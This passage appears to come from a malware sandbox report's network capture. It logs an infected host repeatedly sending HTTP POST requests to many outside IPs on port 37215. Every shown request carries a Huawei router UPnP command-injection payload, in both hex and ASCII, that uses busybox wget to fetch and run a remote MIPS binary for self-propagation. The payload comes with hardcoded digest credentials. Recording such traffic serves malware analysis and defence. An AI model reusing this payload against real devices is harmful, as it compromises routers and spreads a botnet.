                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          363192.168.2.155568441.214.84.24837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.555083036 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          364192.168.2.1548150197.210.145.22337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.555104017 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          365192.168.2.1534914169.72.213.24737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.552696943 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          366192.168.2.1551120157.190.20.13337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.552721977 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          367192.168.2.154208441.210.31.17537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.552766085 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          368192.168.2.1540142204.121.104.9037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.552791119 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          369192.168.2.154020083.64.32.25037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.552814960 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          370192.168.2.1534976197.85.148.12937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.552838087 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          371192.168.2.153793841.15.182.14137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.552856922 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          372192.168.2.1549564197.188.56.8237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.552885056 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
